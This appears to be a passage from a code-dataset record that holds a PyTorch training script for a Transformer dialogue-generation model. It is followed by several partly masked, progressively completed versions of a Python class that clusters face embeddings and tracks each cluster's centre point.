{optimizer.state_dict()['param_groups'][0]['lr']}\"\n 
)\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\ndef convert_ids_to_seq(id_seq, vocab_bulider):\n return [vocab_bulider.id_to_word(idx) for idx in id_seq]\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\nif __name__ == '__main__':\n begin_time = time.strftime('%H%M%S', time.localtime())\n model_name = 'transformer' + begin_time\n opt = parse_args()\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n torch.cuda.set_device(opt.gpuid)\n init_seed(opt.manualSeed)\n ACCUMULATION = opt.batchsize // opt.realbatch\n mylogger = LogManager(checkpoint_step=10, save_dir='./save', model_name\n =model_name, log_file_name=model_name + '.log', mode='max', device=\n device)\n mylogger.save_args(opt)\n writer = SummaryHelper(save_dir='./save', model_name=model_name)\n train_data_dir = './data/opensubtitles'\n vocab_file_list = ['dialogue_length3_6.post']\n vocab_bulider = VocabBulider(train_data_dir, src_files=vocab_file_list,\n ignore_unk_error=True, vocab_file='vocab.txt', min_count=opt.\n mincount, update=opt.update)\n print('most common 50:', vocab_bulider.most_common(50))\n mylogger.log_info('vocab size: %d' % len(vocab_bulider))\n bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, 
ignore_smoothing_error\n =True)\n distinct_1 = DistinctNGram(ngram=1)\n distinct_2 = DistinctNGram(ngram=2)\n if opt.cotk:\n opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test',\n 'opensub_pair_train']\n unk_token = None\n else:\n opensub_file_name_list = ['dialogue_length3_6']\n unk_token = 'UNknown'\n opensub_dataset = OpenSubDataset(data_dir=train_data_dir, vocab_bulider\n =vocab_bulider, file_name_list=opensub_file_name_list, unk_token=\n 'UNknown', save_process=False, samples=opt.trainsamples, add_bos=\n True, add_eos=True)\n print(opensub_dataset.sample())\n opensub_dataloader = DataLoader(opensub_dataset, batch_size=opt.\n realbatch, collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid,\n device=device), shuffle=True, num_workers=opt.workers, drop_last=True)\n dev_data_dir = './data/imsdb'\n imsdb_file_name_list = ['imsdb_lower']\n imsdb_dataset = IMSDBDataset(data_dir=dev_data_dir, vocab_bulider=\n vocab_bulider, file_name_list=imsdb_file_name_list, save_process=\n False, samples=opt.validsamples, add_bos=True, add_eos=True)\n print(imsdb_dataset.sample())\n imsdb_dataloader = DataLoader(imsdb_dataset, batch_size=1, collate_fn=\n PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),\n shuffle=False, num_workers=opt.workers, drop_last=True)\n if opt.mine:\n model = Transformer(ntoken=len(vocab_bulider), d_model=opt.\n embedsize, nhead=opt.nhead, num_encoder_layers=opt.encoderlayer,\n num_decoder_layers=opt.decoderlayer, dim_feedforward=opt.\n feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.\n gumbels, use_src_mask=False, use_tgt_mask=True, use_memory_mask\n =False, activation='relu', use_vocab_attn=False, use_pos_attn=\n False, relative_clip=0, highway=False, device=device,\n max_sent_length=32, share_input_output_embedding=False,\n share_encoder_decoder_embedding=True, share_vocab_embedding=\n True, fix_pos_encoding=opt.fix).to(device)\n else:\n model = TransformerTorch(ntoken=len(vocab_bulider), d_model=opt.\n 
embedsize, nhead=opt.nhead, num_encoder_layers=opt.encoderlayer,\n num_decoder_layers=opt.decoderlayer, dim_feedforward=opt.\n feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.\n gumbels, use_src_mask=False, use_tgt_mask=False,\n use_memory_mask=False, activation='relu', use_vocab_attn=False,\n use_pos_attn=False, relative_clip=0, highway=False, device=\n device, max_sent_length=32, share_input_output_embedding=False,\n share_encoder_decoder_embedding=True, share_vocab_embedding=\n True, fix_pos_encoding=opt.fix).to(device)\n model.show_graph()\n if opt.half:\n model = model.half()\n if opt.ft:\n model = restore_best_state(model, opt.ckpt, save_dir='./save',\n device=model.device)\n if opt.warmup:\n optimizer = RAdam(filter(lambda p: p.requires_grad, model.\n parameters()), lr=1.0, betas=(opt.beta1, opt.beta2), eps=opt.eps)\n rate_ratio = 1.0 / math.sqrt(opt.embedsize)\n scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda\n step: rate_ratio * min(1.0 / math.sqrt(step + 1), step * opt.\n warmup_step ** -1.5))\n else:\n optimizer = RAdam(filter(lambda p: p.requires_grad, model.\n parameters()), lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt\n .eps, weight_decay=opt.weight_decay)\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=opt.\n schedulerstep, gamma=opt.gamma)\n criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=\n vocab_bulider.padid)\n global_train_step, global_valid_step = 0, 0\n run_model(model, opensub_dataloader, imsdb_dataloader, opt.niter,\n criterion, optimizer, scheduler)\n writer.close()\n",
"step-5": "import os\r\nimport math\r\nimport time\r\nfrom tqdm import tqdm\r\nimport torch\r\nfrom torch import nn\r\nimport torch.optim as optim\r\nfrom torch.nn import functional as F\r\nfrom torch.nn.utils import clip_grad_norm_\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom nag.modules import Transformer, TransformerTorch\r\nfrom nag.logger import LogManager, SummaryHelper\r\nfrom nag.metric import BLEUMetric, DistinctNGram\r\nfrom nag.vocab_helper import VocabBulider\r\nfrom nag.utils import PadCollate, get_index, restore_best_state, init_seed\r\nfrom nag.dataset import OpenSubDataset, IMSDBDataset\r\nfrom nag.optimizer import RAdam\r\nfrom nag.options import parse_args\r\nfrom nag.criterion import similarity_regularization, LabelSmoothedCrossEntropyLoss\r\n\r\n\r\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\r\n global global_train_step\r\n model.train()\r\n total_loss = 0.\r\n bleu_score = 0.\r\n distinct_1_score, distinct_2_score = 0., 0.\r\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='train', total=len(opensub_dataset)//opt.realbatch):\r\n tgt_input = tgt[:, :-1]\r\n tgt_gold = tgt[:, 1:]\r\n tgt_lens = tgt_lens - 1\r\n decoder_output_probs, _ = model(\r\n src=src, tgt=tgt_input, src_lengths=src_lens, tgt_lengths=tgt_lens)\r\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\r\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\r\n # loss\r\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\r\n loss.backward()\r\n total_loss += loss.item()\r\n # calculate metrics\r\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\r\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\r\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\r\n # summary writer\r\n global_train_step += 1\r\n writer.log_loss(loss.item()*ACCUMULATION, mode='train')\r\n if (i+1) % ACCUMULATION == 0:\r\n # clip_grad_norm_(model.parameters(), max_norm=5)\r\n optimizer.step()\r\n 
optimizer.zero_grad()\r\n scheduler.step()\r\n if (i+1) % opt.logstep == 0:\r\n avg_loss = (total_loss / opt.logstep) * ACCUMULATION\r\n avg_bleu = bleu_score / opt.logstep\r\n avg_distinct_1 = distinct_1_score / opt.logstep\r\n avg_distinct_2 = distinct_2_score / opt.logstep\r\n mylogger.log(\r\n i, epoch, model, value=avg_loss, is_train=True,\r\n info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')\r\n total_loss = 0.\r\n bleu_score = 0.\r\n distinct_1_score, distinct_2_score = 0., 0.\r\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2], vocab_bulider, global_train_step, mode='train')\r\n\r\n\r\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\r\n global global_valid_step\r\n model.eval()\r\n criterion.eval()\r\n total_loss = 0.\r\n bleu_score = 0.\r\n distinct_1_score, distinct_2_score = 0., 0.\r\n fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' + str(epoch)), 'w', encoding='utf-8')\r\n with torch.no_grad():\r\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='eval', total=len(imsdb_dataset)):\r\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\r\n tgt_gold = tgt[:, 1:]\r\n if beam_size > 1:\r\n output_seqs, output_probs = model.beam_search(\r\n src=src, tgt_begin=tgt_begin, src_length=src_lens,\r\n eos_token_id=vocab_bulider['<eos>'], beam_size=beam_size, max_length=tgt_lens.item())\r\n else:\r\n output_seqs, output_probs = model.greedy(\r\n src=src, tgt_begin=tgt_begin, src_length=src_lens,\r\n eos_token_id=vocab_bulider['<eos>'], max_length=tgt_lens.item())\r\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\r\n # loss\r\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1), tgt_gold[:, :min_len])\r\n total_loss += loss.item()\r\n # calculate metrics\r\n out_lens = [min_len]\r\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\r\n distinct_1_score += 
distinct_1(output_seqs, out_lens)\r\n distinct_2_score += distinct_2(output_seqs, out_lens)\r\n # show sequence\r\n global_valid_step += 1\r\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0], vocab_bulider)) + '\\n')\r\n if (i+1) % opt.logstep == 0:\r\n show_gen_seq(src, output_seqs, out_lens, tgt_gold, vocab_bulider, global_valid_step, mode='valid')\r\n # summary\r\n avg_loss = total_loss / i\r\n avg_bleu = bleu_score / i\r\n avg_distinct_1 = distinct_1_score / i\r\n avg_distinct_2 = distinct_2_score / i\r\n writer.log_loss(avg_loss, mode='valid')\r\n mylogger.log(\r\n i, epoch, model, value=avg_bleu, is_train=False,\r\n info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')\r\n fout.close()\r\n\r\n\r\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer, scheduler):\r\n mylogger.log_info('Running Model')\r\n for i in range(niter):\r\n mylogger.log_info(f'EPOCH: {i}, lr: {optimizer.state_dict()[\"param_groups\"][0][\"lr\"]}')\r\n train(i, model, train_loader, criterion, optimizer, scheduler)\r\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\r\n\r\n\r\ndef convert_ids_to_seq(id_seq, vocab_bulider):\r\n return [vocab_bulider.id_to_word(idx) for idx in id_seq]\r\n\r\n\r\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth, vocab_bulider, step, mode='train'):\r\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth):\r\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\r\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else out_id, vocab_bulider)\r\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\r\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:get_index(in_seq, '<pad>')]), global_step=step)\r\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq), global_step=step)\r\n writer.add_text(tag=mode + '_reps', sentence=' 
'.join(gold_seq[:get_index(in_seq, '<pad>')]), global_step=step)\r\n\r\n\r\nif __name__ == '__main__':\r\n begin_time = time.strftime(\"%H%M%S\", time.localtime())\r\n model_name = 'transformer' + begin_time\r\n opt = parse_args()\r\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n torch.cuda.set_device(opt.gpuid)\r\n init_seed(opt.manualSeed)\r\n ACCUMULATION = opt.batchsize // opt.realbatch\r\n\r\n mylogger = LogManager(checkpoint_step=10,\r\n save_dir='./save',\r\n model_name=model_name,\r\n log_file_name=model_name + '.log',\r\n mode='max', device=device)\r\n mylogger.save_args(opt)\r\n writer = SummaryHelper(save_dir='./save', model_name=model_name)\r\n\r\n train_data_dir = './data/opensubtitles'\r\n # train_data_dir = './data/wmt15en-de'\r\n\r\n vocab_file_list = ['dialogue_length3_6.post']\r\n # vocab_file_list = ['all_de-en.bpe.post', 'all_de-en.bpe.response']\r\n vocab_bulider = VocabBulider(\r\n train_data_dir, src_files=vocab_file_list, ignore_unk_error=True,\r\n vocab_file='vocab.txt', min_count=opt.mincount, update=opt.update)\r\n print('most common 50:', vocab_bulider.most_common(50))\r\n mylogger.log_info('vocab size: %d' % len(vocab_bulider))\r\n\r\n # metircs\r\n bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, ignore_smoothing_error=True)\r\n distinct_1 = DistinctNGram(ngram=1)\r\n distinct_2 = DistinctNGram(ngram=2)\r\n\r\n # train dataset and dataloader\r\n if opt.cotk: # use dataset in paper 'cotk'\r\n # opensub_file_name_list = ['all_de-en.bpe']\r\n opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test', 'opensub_pair_train']\r\n unk_token = None\r\n else: # use dataset in paper 'Non-Autoregressive Neural Dialogue Generation'\r\n opensub_file_name_list = ['dialogue_length3_6']\r\n unk_token = 'UNknown'\r\n opensub_dataset = OpenSubDataset(\r\n data_dir=train_data_dir, vocab_bulider=vocab_bulider,\r\n file_name_list=opensub_file_name_list, unk_token='UNknown',\r\n save_process=False, samples=opt.trainsamples, 
add_bos=True, add_eos=True)\r\n print(opensub_dataset.sample())\r\n opensub_dataloader = DataLoader(\r\n opensub_dataset, batch_size=opt.realbatch,\r\n collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),\r\n shuffle=True, num_workers=opt.workers, drop_last=True)\r\n\r\n # dev set\r\n dev_data_dir = './data/imsdb'\r\n imsdb_file_name_list = ['imsdb_lower']\r\n # dev_data_dir = './data/wmt15en-de'\r\n # imsdb_file_name_list = ['newstest']\r\n imsdb_dataset = IMSDBDataset(\r\n data_dir=dev_data_dir, vocab_bulider=vocab_bulider,\r\n file_name_list=imsdb_file_name_list, save_process=False,\r\n samples=opt.validsamples, add_bos=True, add_eos=True)\r\n print(imsdb_dataset.sample())\r\n imsdb_dataloader = DataLoader(\r\n imsdb_dataset, batch_size=1,\r\n collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),\r\n shuffle=False, num_workers=opt.workers, drop_last=True)\r\n\r\n # model definition\r\n if opt.mine:\r\n model = Transformer(\r\n ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,\r\n num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,\r\n dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,\r\n use_src_mask=False, use_tgt_mask=True, use_memory_mask=False,\r\n activation='relu', use_vocab_attn=False, use_pos_attn=False,\r\n relative_clip=0, highway=False, device=device, max_sent_length=32,\r\n share_input_output_embedding=False, share_encoder_decoder_embedding=True,\r\n share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)\r\n else:\r\n model = TransformerTorch(\r\n ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,\r\n num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,\r\n dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,\r\n use_src_mask=False, use_tgt_mask=False, use_memory_mask=False,\r\n activation='relu', use_vocab_attn=False, use_pos_attn=False,\r\n 
relative_clip=0, highway=False, device=device, max_sent_length=32,\r\n share_input_output_embedding=False, share_encoder_decoder_embedding=True,\r\n share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)\r\n model.show_graph()\r\n if opt.half:\r\n model = model.half()\r\n if opt.ft:\r\n model = restore_best_state(model, opt.ckpt, save_dir='./save', device=model.device)\r\n\r\n # optimizer and scheduler\r\n if opt.warmup:\r\n optimizer = RAdam(\r\n filter(lambda p: p.requires_grad, model.parameters()),\r\n lr=1., betas=(opt.beta1, opt.beta2), eps=opt.eps)\r\n rate_ratio = 1. / math.sqrt(opt.embedsize)\r\n # top_lr = 1 / sqrt(d_model * warmup_step) at step == warmup_step\r\n scheduler = optim.lr_scheduler.LambdaLR(\r\n optimizer,\r\n lr_lambda=lambda step: rate_ratio * min(1. / math.sqrt(step+1), step*(opt.warmup_step**(-1.5))))\r\n else:\r\n optimizer = RAdam(\r\n filter(lambda p: p.requires_grad, model.parameters()),\r\n lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt.eps,\r\n weight_decay=opt.weight_decay)\r\n scheduler = optim.lr_scheduler.StepLR(\r\n optimizer, step_size=opt.schedulerstep, gamma=opt.gamma)\r\n # loss function\r\n # criterion = nn.CrossEntropyLoss(ignore_index=vocab_bulider.padid) # for Transformer\r\n criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=vocab_bulider.padid)\r\n\r\n # run model\r\n global_train_step, global_valid_step = 0, 0\r\n run_model(\r\n model, opensub_dataloader, imsdb_dataloader,\r\n opt.niter, criterion, optimizer, scheduler)\r\n writer.close()\r\n",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
<|reserved_special_token_0|>
class Cluster:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
<|reserved_special_token_0|>
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_center_point(self):
return self.center_point
<|reserved_special_token_0|>
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Cluster:
<|reserved_special_token_0|>
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,
label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings
) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
<|reserved_special_token_0|>
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None,
overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point +
embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
try:
self.center_point = (old_num_embeddings * self.center_point -
embedding) / self.num_embeddings
except ZeroDivisionError:
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
return torch.sum(torch.stack(embeddings), dim=0)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logging.basicConfig(level=logging.INFO)
class Cluster:
metric = 2
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,
label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings
) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
def get_embeddings(self, with_embeddings_ids=False, as_dict=False,
as_list=False):
if with_embeddings_ids or as_dict:
if as_dict:
return self.embeddings_dict
return self.embeddings_dict.items()
embeddings = self.embeddings_dict.values()
if as_list:
return list(embeddings)
return embeddings
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None,
overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point +
embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
try:
self.center_point = (old_num_embeddings * self.center_point -
embedding) / self.num_embeddings
except ZeroDivisionError:
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
return torch.sum(torch.stack(embeddings), dim=0)
<|reserved_special_token_1|>
from Logic.ProperLogic.helper_classes.reducer import MaxReducer
from Logic.ProperLogic.misc_helpers import log_error
import torch
from itertools import count
import logging
logging.basicConfig(level=logging.INFO)
class Cluster:
metric = 2
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,
label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings
) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
def get_embeddings(self, with_embeddings_ids=False, as_dict=False,
as_list=False):
if with_embeddings_ids or as_dict:
if as_dict:
return self.embeddings_dict
return self.embeddings_dict.items()
embeddings = self.embeddings_dict.values()
if as_list:
return list(embeddings)
return embeddings
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None,
overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point +
embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
try:
self.center_point = (old_num_embeddings * self.center_point -
embedding) / self.num_embeddings
except ZeroDivisionError:
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
return torch.sum(torch.stack(embeddings), dim=0)
<|reserved_special_token_1|>
from Logic.ProperLogic.helper_classes.reducer import MaxReducer
from Logic.ProperLogic.misc_helpers import log_error
import torch
from itertools import count
import logging
logging.basicConfig(level=logging.INFO)
class Cluster:
metric = 2
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None, label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
# cast embeddings to dict
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
def get_embeddings(self, with_embeddings_ids=False, as_dict=False, as_list=False):
if with_embeddings_ids or as_dict:
if as_dict:
return self.embeddings_dict
return self.embeddings_dict.items()
embeddings = self.embeddings_dict.values()
if as_list:
return list(embeddings)
return embeddings
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
